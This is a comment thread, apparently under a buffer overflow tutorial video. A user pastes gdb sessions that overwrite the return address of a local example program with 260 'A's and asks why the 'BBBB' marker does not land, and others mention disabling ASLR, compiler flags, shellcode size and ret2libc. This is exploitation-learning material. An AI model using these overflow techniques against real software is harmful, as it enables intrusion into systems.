I can not get the shell to pop at the end. I wonder is it this: (gdb) run $(python -c "print('A'*260)") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260)") AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) run $(python -c "print('A'*260+'BBBB')") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260+'BBBB')") AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB Program received signal SIGSEGV, Segmentation fault. 0x0804848a in main () I do not get 0x42424242 in ?? () I think this is my problem.
@lonewanderer1776
@lonewanderer1776 8 years ago
Same
@lonewanderer1776
@lonewanderer1776 8 years ago
Something to do with the OS? Are you using Debian or Ubuntu?
@pberson
@pberson 8 years ago
I am using Ubuntu 16.02
@danielslater
@danielslater 8 years ago
What compiler settings are you using? If you don't use the proper compiler settings and turn ASLR off then it won't work.
@pberson
@pberson 8 years ago
Tested with both the correct compiler settings and ASLR off.
@Darieee
@Darieee 5 years ago
Impressive skills, thanks for the tutorial!!
@gordoburrito2951
@gordoburrito2951 7 years ago
What happens if the size of the buffer is smaller than the bytes of the shellcode?
@danielslater
@danielslater 7 years ago
Then you can't use that shellcode, so you'll either need shorter shellcode, use some of the already written code as part of your shellcode, or use another approach such as ret2libc.